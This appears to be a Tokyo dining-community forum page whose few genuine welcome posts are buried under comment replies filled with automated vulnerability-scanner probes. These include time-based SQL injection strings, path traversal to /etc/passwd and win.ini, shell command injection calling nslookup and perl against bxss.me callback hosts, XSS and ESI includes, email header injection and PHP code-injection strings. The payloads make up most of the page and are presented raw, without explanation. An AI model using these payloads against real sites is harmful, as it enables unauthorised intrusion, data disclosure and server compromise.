Welcome to our community! I want this to be a two-way exchange of information, not just with me but with all of you. Please feel free to post your questions as well as your restaurant reviews, dining companionship, and so on.
Hello! I’m looking forward to reading the questions and posts here. Is anyone going to be in Tokyo from Early to mid December? I’d love to meet some likeminded foodies
Thanks as always for all your support and information Saitosan, as indicated previously happy to offer some support for your ongoing efforts. Looking forward to interacting w/this community!
Glad to be able to support after all the interesting discussions and posts I've enjoyed here over the last few years! Looking forward to chatting here.
Hi guys, nice to see some familiar faces in here. Thanks Saito-san for the massive guide which will make me FOMO into getting reservations at many places I've never heard of (lol). Anyone heading to Tokyo sometime soon? I'm going in November and having a long-awaited sushi bonanza after being deprived of great sushi for years! Super excited!
Afraid we'll be missing you Justin - we'll be around Tokyo for a short stint in mid February and mid March and if you or any of the other tokyotabletrip members would like to sync up I'm sure it'd be spectacular.
Dropping by to say hi to everyone. I am not based in Japan but do make an effort to travel to Japan often enough to explore all corners and have good food. Glad to know all of you here, I have been lazy to write down my thoughts on my previous experiences but now I feel motivated to share more. Hopefully will get to meet some of you guys some day!
Thanks to saito-san for the wonderful guide. Hi and happy to see all the familiar faces. I will be in Tokyo with my family next May. Happy to meet you guys if you all are free during the period.
Hi all, is anyone having issues trying to access the "Read more" part of each thread? Wondering if it's just me. Also, if you create a new post, I believe you must avoid certain special characters like question marks in the title, or else your post will redirect to an "Internal Server Error"?
14 Comments
Hello! I’m looking forward to reading the questions and posts here. Is anyone going to be in Tokyo from Early to mid December? I’d love to meet some likeminded foodies
re: iambenjaminw
pG6NJ7GX
re: iambenjaminw
1*
re: iambenjaminw
1*
re: iambenjaminw
1*
re: iambenjaminw
1*
re: iambenjaminw
-1 OR 2+570-570-1=0+0+0+1
re: iambenjaminw
-1 OR 3+570-570-1=0+0+0+1
re: iambenjaminw
if(now()=sysdate(),sleep(15),0)
re: iambenjaminw
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: iambenjaminw
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: iambenjaminw
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: iambenjaminw
-1; waitfor delay '0:0:15' --
re: iambenjaminw
-1); waitfor delay '0:0:15' --
re: iambenjaminw
1 waitfor delay '0:0:15' --
re: iambenjaminw
zx1rn8ZD'; waitfor delay '0:0:15' --
re: iambenjaminw
-5 OR 297=(SELECT 297 FROM PG_SLEEP(15))--
re: iambenjaminw
-5) OR 578=(SELECT 578 FROM PG_SLEEP(15))--
re: iambenjaminw
-1)) OR 768=(SELECT 768 FROM PG_SLEEP(15))--
re: iambenjaminw
vNgoHdau' OR 68=(SELECT 68 FROM PG_SLEEP(15))--
re: iambenjaminw
JurgCCNI') OR 299=(SELECT 299 FROM PG_SLEEP(15))--
re: iambenjaminw
oqkMdYbY')) OR 138=(SELECT 138 FROM PG_SLEEP(15))--
re: iambenjaminw
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: iambenjaminw
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: iambenjaminw
'||(select 1 from (select pg_sleep(15))x)||'
re: iambenjaminw
''||(select 1 from (select pg_sleep(15))x)||''
re: iambenjaminw
1'"
re: iambenjaminw
@@KXXcy
re: iambenjaminw
1XrpGyZ7nO
re: iambenjaminw
<esi:include src="http://bxss.me/rpb.png"/>
re: iambenjaminw
%0abcc:074625.67-22361.67.ef8b6.19990.2@bxss.me
re: iambenjaminw
response.write(9528983*9718538)
re: iambenjaminw
to@example.com>%0d%0abcc:074625.67-22362.67.ef8b6.19990.2@bxss.me
re: iambenjaminw
'+response.write(9528983*9718538)+'
re: iambenjaminw
"+response.write(9528983*9718538)+"
re: iambenjaminw
${9999374+9999806}
re: iambenjaminw
../../../../../../../../../../../../../../etc/passwd
re: iambenjaminw
../../../../../../../../../../../../../../windows/win.ini
re: iambenjaminw
file:///etc/passwd
re: iambenjaminw
../../../../../../../../../../../../../../../proc/version
re: iambenjaminw
'.gethostbyname(lc('hithr'.'wziqmhctf8a79.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(104).chr(88).chr(104).chr(65).'
re: iambenjaminw
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: iambenjaminw
)
re: iambenjaminw
".gethostbyname(lc("hitqj"."mwhlkixx86043.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(82).chr(102).chr(71)."
re: iambenjaminw
../../../../../../../../../../etc/passwd%00.jpg
re: iambenjaminw
!(()&&!|*|*|
re: iambenjaminw
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: iambenjaminw
^(#$!@#$)(()))******
re: iambenjaminw
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: iambenjaminw
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: iambenjaminw
/etc/passwd
re: iambenjaminw
echo xnacjp$()\ xenipa\nz^xyu||a #' &echo xnacjp$()\ xenipa\nz^xyu||a #|" &echo xnacjp$()\ xenipa\nz^xyu||a #
re: iambenjaminw
%2fetc%2fpasswd
re: iambenjaminw
&echo qpknvr$()\ atbqsb\nz^xyu||a #' &echo qpknvr$()\ atbqsb\nz^xyu||a #|" &echo qpknvr$()\ atbqsb\nz^xyu||a #
re: iambenjaminw
/.././.././.././.././.././.././.././../etc/./passwd%00
re: iambenjaminw
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: iambenjaminw
|echo uvpxzm$()\ hifkjy\nz^xyu||a #' |echo uvpxzm$()\ hifkjy\nz^xyu||a #|" |echo uvpxzm$()\ hifkjy\nz^xyu||a #
re: iambenjaminw
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: iambenjaminw
HttP://bxss.me/t/xss.html?%00
re: iambenjaminw
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: iambenjaminw
(nslookup hitnssvegvavce0b3e.bxss.me||perl -e "gethostbyname('hitnssvegvavce0b3e.bxss.me')")
re: iambenjaminw
"+"A".concat(70-3).concat(22*4).concat(112).concat(75).concat(110).concat(82)+(require"socket"
Socket.gethostbyname("hitjh"+"jkeynsofb5a83.bxss.me.")[3].to_s)+"
re: iambenjaminw
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: iambenjaminw
bxss.me/t/xss.html?%00
re: iambenjaminw
Http://bxss.me/t/fit.txt
re: iambenjaminw
$(nslookup hitukcfrkadhddb770.bxss.me||perl -e "gethostbyname('hitukcfrkadhddb770.bxss.me')")
re: iambenjaminw
'+'A'.concat(70-3).concat(22*4).concat(122).concat(74).concat(119).concat(78)+(require'socket'
Socket.gethostbyname('hitbs'+'jvhhecrx20d5e.bxss.me.')[3].to_s)+'
re: iambenjaminw
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: iambenjaminw
http://bxss.me/t/fit.txt%3F.jpg
re: iambenjaminw
&nslookup hitijrbzglvyaef44a.bxss.me&'\"`0&nslookup hitijrbzglvyaef44a.bxss.me&`'
re: iambenjaminw
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: iambenjaminw
/etc/shells
re: iambenjaminw
&(nslookup hitsojjpiogpc44341.bxss.me||perl -e "gethostbyname('hitsojjpiogpc44341.bxss.me')")&'\"`0&(nslookup hitsojjpiogpc44341.bxss.me||perl -e "gethostbyname('hitsojjpiogpc44341.bxss.me')")&`'
re: iambenjaminw
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: iambenjaminw
c:/windows/win.ini
re: iambenjaminw
|(nslookup hitezvfneobnmbca37.bxss.me||perl -e "gethostbyname('hitezvfneobnmbca37.bxss.me')")
re: iambenjaminw
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: iambenjaminw
file:///etc/passwd
re: iambenjaminw
bxss.me
re: iambenjaminw
`(nslookup hitypypswuanu806bb.bxss.me||perl -e "gethostbyname('hitypypswuanu806bb.bxss.me')")`
re: iambenjaminw
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: iambenjaminw
/\../\../\../\../\../\../\../etc/passwd
re: iambenjaminw
;(nslookup hitebnljrnlxd1e760.bxss.me||perl -e "gethostbyname('hitebnljrnlxd1e760.bxss.me')")|(nslookup hitebnljrnlxd1e760.bxss.me||perl -e "gethostbyname('hitebnljrnlxd1e760.bxss.me')")&(nslookup hitebnljrnlxd1e760.bxss.me||perl -e "gethostbyname('hitebnljrnlxd1e760.bxss.me')")
re: iambenjaminw
';print(md5(31337));$a='
re: iambenjaminw
/WEB-INF/web.xml
re: iambenjaminw
";print(md5(31337));$a="
re: iambenjaminw
C:\WINDOWS\system32\drivers\etc\hosts
re: iambenjaminw
${@print(md5(31337))}
re: iambenjaminw
'"
re: iambenjaminw
../../../../../../../../../../windows/win.ini%00.jpg
re: iambenjaminw
${@print(md5(31337))}\
re: iambenjaminw
<!--
re: iambenjaminw
/../../../../../../../../../../boot.ini
re: iambenjaminw
'.print(md5(31337)).'
re: iambenjaminw
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: iambenjaminw
..\..\..\..\..\..\..\..\windows\win.ini
re: iambenjaminw
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: iambenjaminw
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: iambenjaminw
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: iambenjaminw
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: iambenjaminw
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: iambenjaminw
WEB-INF/web.xml
re: iambenjaminw
WEB-INF\web.xml
Thanks as always for all your support and information Saitosan, as indicated previously happy to offer some support for your ongoing efforts. Looking forward to interacting w/this community!
re: Shi
HAMvoXmf
re: Shi
1*
re: Shi
1*
re: Shi
1*
re: Shi
1*
re: Shi
-1 OR 2+753-753-1=0+0+0+1
re: Shi
-1 OR 3+753-753-1=0+0+0+1
re: Shi
if(now()=sysdate(),sleep(15),0)
re: Shi
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Shi
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Shi
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Shi
-1; waitfor delay '0:0:15' --
re: Shi
-1); waitfor delay '0:0:15' --
re: Shi
1 waitfor delay '0:0:15' --
re: Shi
nVO24VuN'; waitfor delay '0:0:15' --
re: Shi
-5 OR 524=(SELECT 524 FROM PG_SLEEP(15))--
re: Shi
-5) OR 62=(SELECT 62 FROM PG_SLEEP(15))--
re: Shi
-1)) OR 586=(SELECT 586 FROM PG_SLEEP(15))--
re: Shi
FZmy9UzP' OR 36=(SELECT 36 FROM PG_SLEEP(15))--
re: Shi
HMTm0TUY') OR 593=(SELECT 593 FROM PG_SLEEP(15))--
re: Shi
k71JD6En')) OR 972=(SELECT 972 FROM PG_SLEEP(15))--
re: Shi
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Shi
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Shi
'||(select 1 from (select pg_sleep(15))x)||'
re: Shi
''||(select 1 from (select pg_sleep(15))x)||''
re: Shi
1'"
re: Shi
@@dx56V
re: Shi
1Dfq6MR46gO
re: Shi
response.write(9704517*9758290)
re: Shi
'+response.write(9704517*9758290)+'
re: Shi
"+response.write(9704517*9758290)+"
re: Shi
<esi:include src="http://bxss.me/rpb.png"/>
re: Shi
../../../../../../../../../../../../../../etc/passwd
re: Shi
%0abcc:074625.67-22345.67.6c713.19990.2@bxss.me
re: Shi
../../../../../../../../../../../../../../windows/win.ini
re: Shi
to@example.com>%0d%0abcc:074625.67-22346.67.6c713.19990.2@bxss.me
re: Shi
file:///etc/passwd
re: Shi
${10000398+9999467}
re: Shi
../../../../../../../../../../../../../../../proc/version
re: Shi
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Shi
../../../../../../../../../../etc/passwd%00.jpg
re: Shi
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Shi
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Shi
echo uupzte$()\ emacuz\nz^xyu||a #' &echo uupzte$()\ emacuz\nz^xyu||a #|" &echo uupzte$()\ emacuz\nz^xyu||a #
re: Shi
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Shi
&echo vsnqpr$()\ oobhfl\nz^xyu||a #' &echo vsnqpr$()\ oobhfl\nz^xyu||a #|" &echo vsnqpr$()\ oobhfl\nz^xyu||a #
re: Shi
/etc/passwd
re: Shi
)
re: Shi
|echo jjdzkb$()\ atkqtn\nz^xyu||a #' |echo jjdzkb$()\ atkqtn\nz^xyu||a #|" |echo jjdzkb$()\ atkqtn\nz^xyu||a #
re: Shi
%2fetc%2fpasswd
re: Shi
!(()&&!|*|*|
re: Shi
(nslookup hitfbeccsymnxa06e5.bxss.me||perl -e "gethostbyname('hitfbeccsymnxa06e5.bxss.me')")
re: Shi
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Shi
^(#$!@#$)(()))******
re: Shi
$(nslookup hitfcusbbnahd40755.bxss.me||perl -e "gethostbyname('hitfcusbbnahd40755.bxss.me')")
re: Shi
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Shi
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Shi
&nslookup hitqxxbdppjnr516f8.bxss.me&'\"`0&nslookup hitqxxbdppjnr516f8.bxss.me&`'
re: Shi
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Shi
&(nslookup hitkpomorvuet951e6.bxss.me||perl -e "gethostbyname('hitkpomorvuet951e6.bxss.me')")&'\"`0&(nslookup hitkpomorvuet951e6.bxss.me||perl -e "gethostbyname('hitkpomorvuet951e6.bxss.me')")&`'
re: Shi
'.gethostbyname(lc('hitxp'.'mkbgehik6bf70.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(73).chr(102).chr(87).'
re: Shi
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Shi
|(nslookup hittiazqaruip98336.bxss.me||perl -e "gethostbyname('hittiazqaruip98336.bxss.me')")
re: Shi
".gethostbyname(lc("hitqc"."xaxuydsn08512.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(75).chr(120).chr(89)."
re: Shi
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Shi
`(nslookup hititwsggpctbad09b.bxss.me||perl -e "gethostbyname('hititwsggpctbad09b.bxss.me')")`
re: Shi
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Shi
file:///etc/passwd
re: Shi
;(nslookup hitdgysokzxiid3e20.bxss.me||perl -e "gethostbyname('hitdgysokzxiid3e20.bxss.me')")|(nslookup hitdgysokzxiid3e20.bxss.me||perl -e "gethostbyname('hitdgysokzxiid3e20.bxss.me')")&(nslookup hitdgysokzxiid3e20.bxss.me||perl -e "gethostbyname('hitdgysokzxiid3e20.bxss.me')")
re: Shi
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Shi
/\../\../\../\../\../\../\../etc/passwd
re: Shi
Http://bxss.me/t/fit.txt
re: Shi
HttP://bxss.me/t/xss.html?%00
re: Shi
/WEB-INF/web.xml
re: Shi
"+"A".concat(70-3).concat(22*4).concat(98).concat(71).concat(115).concat(90)+(require"socket"
Socket.gethostbyname("hitbu"+"occjtvrj66e80.bxss.me.")[3].to_s)+"
re: Shi
http://bxss.me/t/fit.txt%3F.jpg
re: Shi
bxss.me/t/xss.html?%00
re: Shi
C:\WINDOWS\system32\drivers\etc\hosts
re: Shi
'+'A'.concat(70-3).concat(22*4).concat(118).concat(81).concat(112).concat(65)+(require'socket'
Socket.gethostbyname('hitle'+'zfstyekf894c7.bxss.me.')[3].to_s)+'
re: Shi
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Shi
/etc/shells
re: Shi
../../../../../../../../../../windows/win.ini%00.jpg
re: Shi
c:/windows/win.ini
re: Shi
/../../../../../../../../../../boot.ini
re: Shi
bxss.me
re: Shi
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Shi
'"
re: Shi
..\..\..\..\..\..\..\..\windows\win.ini
re: Shi
<!--
re: Shi
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Shi
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Shi
';print(md5(31337));$a='
re: Shi
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Shi
";print(md5(31337));$a="
re: Shi
